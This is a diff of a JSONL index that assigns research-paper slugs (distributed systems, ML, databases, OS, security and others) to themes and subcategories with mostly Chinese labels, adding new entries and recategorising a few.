{"slug":"gilbert-lynch-2002","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"gin-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"glm-5-agentic-engineering","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"llm","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"glue-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"gmlake","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"系统","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"gmw-mental-game-1987","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"goal-misgeneralization-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"godel-1931","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"数学逻辑 / 计算理论","source":"category","confidence":"high","rawCategory":"形式化方法"} +{"slug":"godel-1931","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"goldsmith-1987-bvh","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"goodfellow-fgsm-2014","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"google-1998","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} @@ -347,11 +448,14 @@ {"slug":"gortler-1996-lumigraph","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"gpipe-2019","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"gpt-3","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"NLP","source":"category","confidence":"high","rawCategory":"NLP"} +{"slug":"gpt-4-launch-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"gptq-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"gpu-cache-coherence-2013","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"gpu-microbenchmarking-2010","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"gpudirect-rdma-2014","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"graal-truffle-2017","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"graalvm-truffle","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"grade-inflation","area":"papers","theme":"其他","themeId":"other","subcategory":"模型评估","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} {"slug":"gradual-typing","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"graf-saidi-1997","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"granule","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} @@ -365,8 +469,12 @@ {"slug":"grounded-videollm-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"gru-2014","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"gshard-2020","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"h-store-stonebraker-2008","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"h2o-token-eviction-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"hackernews-frontpage-scrape","area":"papers","theme":"其他","themeId":"other","subcategory":"系统工具","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} {"slug":"hacl-star-2017","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"halide","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"halo2-2022","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码与零知识","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"hamming-1950","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"信息论","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"hanrahan-1991-hierarchical-radiosity","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"haven-2014","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} @@ -376,42 +484,68 @@ {"slug":"hdfs-2010","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"heartbleed-2014","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"heckbert-1986-texture-survey","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"hekaton-2013-sigmod","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"hekaton-microsoft-2013","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"hekaton","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"helium-type-errors","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"helland-2007","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"herlihy-moss-tm","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"herring-parallel-batch-order-fairness-on-dag-based-blockchain-consensus-arxiv-26","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"hewitt-actor-model","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"hexagent-agentic-scheduling","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"hindley-milner","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"hits-1999","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"hkdf-rfc5869","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"hlc-2014","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"hnsw-2018","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"hoare-csp-1978","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"hoare-logic","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言 / 形式化方法","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"hoare-monitors-1974","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"hol-light-2009","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"holzmann-spin-1997","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"hopper-architecture-2022","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"hopper-dpo","area":"papers","theme":"其他","themeId":"other","subcategory":"对齐","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} {"slug":"hotspot-server-compiler","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"hotstuff-2019","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"hott-book-2013","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"hour-llava-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"http-2","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"category","confidence":"high","rawCategory":"网络协议"} {"slug":"hu-2018-mls-mpm","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"hudi-uber-2017","area":"papers","theme":"数据库","themeId":"databases","subcategory":"现代数据库","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"huffman-1952","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"信息论 / 算法","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"hughes-fp-matters","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"hullft-ttft","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"hydra-1974","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"hydra-x","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ai-ml-models","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"hyper-kemper-neumann-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"hyperkernel-2017","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"hyperplonk-2022","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码与零知识","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"ice-rfc-5245","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"iceberg-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"现代数据库","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"ideal-ae","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"表示学习","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"idris-brady","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} -{"slug":"imagen-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"imagen-2022","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"系统综合","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} {"slug":"immix-mark-region","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"improving-embeddings-llm","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"嵌入","source":"candidates.topic+category","confidence":"high","rawCategory":"信息检索"} +{"slug":"in-context-reward-adaptation-for-robust-preference-modeling-arxiv-2605-30323","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"incident-command-system-2022","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"indri-2005","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"induction-heads","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 可解释性","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"inductive-deductive-synthesis-verified-distributed-systems-arxiv-2605-23109","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"infer-biabduction","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"infinite-llm","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"LLM系统","source":"candidates.topic+category","confidence":"high","rawCategory":"分布式系统"} +{"slug":"infinitts-llm","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"长上下文","source":"candidates.topic+category","confidence":"high","rawCategory":"分布式系统"} {"slug":"ingres-1976","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"instant-ngp-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"instructgpt","area":"papers","theme":"NLP","themeId":"nlp","subcategory":"NLP","source":"category","confidence":"high","rawCategory":"NLP"} +{"slug":"interleave-thinker","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"internvideo2-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"internvideo2-5-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"internvl-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"io-uring-axboe-2019","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"io-uring","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"操作系统","source":"category","confidence":"high","rawCategory":"操作系统"} +{"slug":"iorm-hierarchical-i-o-governance-for-thousands-of-consolidated-databases-arxiv-2","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"ipfs-2014","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"iris-2015","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"ironfleet-2015","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} @@ -421,17 +555,20 @@ {"slug":"jacobson-1988","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"janus-2016","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"jemalloc-2006","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"jemalloc-evans-2006","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"jensen-1996-photon-mapping","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"jupiter-1995","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"jupiter-2015","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"jwt-rfc-7519","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"后端","source":"category","confidence":"high","rawCategory":"后端 API"} {"slug":"k3s","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} +{"slug":"k42-research-os-2006","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"kademlia-2002","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"kafka-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"kafka","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"databases / 分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"kahn-natural-semantics","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"kairouz-advances-fl-2019","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"kajiya-1986-rendering-equation","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"kakoune-vim-philosophy","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"kami-2017","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"karger-1997-consistent-hashing","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"karis-2014-taa","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} @@ -439,47 +576,66 @@ {"slug":"karp-21","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"计算理论","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"karras-2012-parallel-bvh","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"kazhdan-2006-poisson-recon","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"kelly-criterion-1956","area":"papers","theme":"其他","themeId":"other","subcategory":"量化金融","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"kepler-architecture-2012","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"kildall-dataflow","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"kim-rowhammer-2014","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"knrm-2017","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"knuth-literate-1984","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"knuth-lr-1965","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"knuth-taocp","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"算法","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"kocher-spectre-2019","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"kokkos-2014","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"koren-mf-2009","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"krishnamurthy-1999-http11","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} -{"slug":"kubernetes-2016","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"kubernetes-2016","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"系统综合","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} {"slug":"kustomize","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} +{"slug":"kv-cache-budget-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"kv-fold","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"kvm-2007","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"l3cube-mahasocial","area":"papers","theme":"其他","themeId":"other","subcategory":"知识图谱","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} {"slug":"l4-1995","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"l4-microkernel-1995","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"label-smoothing-2016","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"labvla","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"机器人","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"lacuna-program-holes","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"lacuna-safe-agents-as-recursive-program-holes-arxiv-2605-28617","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"lafortune-1993-bdpt","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"lakehouse-2021","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"lalr-deremer","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"lambda-calculus","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言 / 计算理论","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"lambdarank-2006","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"lamport-1978","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"papers / 分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} +{"slug":"lamport-time-clocks-1978","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"lamport-tla-1994","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"lampson-hints-1983","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"lampson-hints","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"系统设计","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"landin-secd","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"language-server-protocol-spec","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"lattner-llvm-2004","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"layernorm-2016","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"lean-prover","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"lean-tactics","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"learnedcache-ebpf-integrated-perceptron-based-eviction-policy-arxiv-2605-26168","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"lee-keystone-2020","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"leis-2015-optimizers","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"lerner-seminal","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"levoy-hanrahan-1996-light-field","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} 